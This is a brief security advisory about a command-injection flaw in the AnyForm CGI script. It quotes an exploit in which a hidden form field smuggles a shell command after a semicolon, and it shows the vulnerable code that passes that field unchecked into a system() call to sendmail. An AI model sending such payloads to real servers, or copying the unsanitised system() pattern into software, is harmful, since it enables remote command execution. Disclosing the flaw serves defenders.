Anyform CGI Semicolon Vulnerability

Exploit as taken from the original post on this issue:

To exploit, create a form with a hidden field something like this:

<input type="hidden" name="AnyFormTo" value="foo@bar.com;command-to-execute
with whatever arguments;/usr/lib/sendmail -t foo@bar.com ">

Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:

SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
system(SystemCommand);

Since system invokes a shell, the semicolons are treated as command
delimeters and anything can be inserted.


 

Privacy Statement
Copyright 2010, SecurityFocus